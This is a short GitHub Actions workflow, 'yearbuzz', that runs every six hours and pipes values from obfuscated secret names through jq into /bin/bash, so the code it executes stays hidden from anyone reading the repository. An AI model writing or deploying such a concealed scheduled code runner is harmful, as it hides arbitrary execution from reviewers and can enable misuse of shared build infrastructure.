name: yearbuzz

on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yearbuzz
        env:
          vyxef60306: ${{ secrets.vyxef60306 }}
        run: |
          echo $vyxef60306 | jq -r .dqi87 | /bin/bash
          echo $tntfc73273 | jq -r .dvtbm181 | /bin/bash
          echo $x7819 | jq -r .mducn3780 | /bin/bash

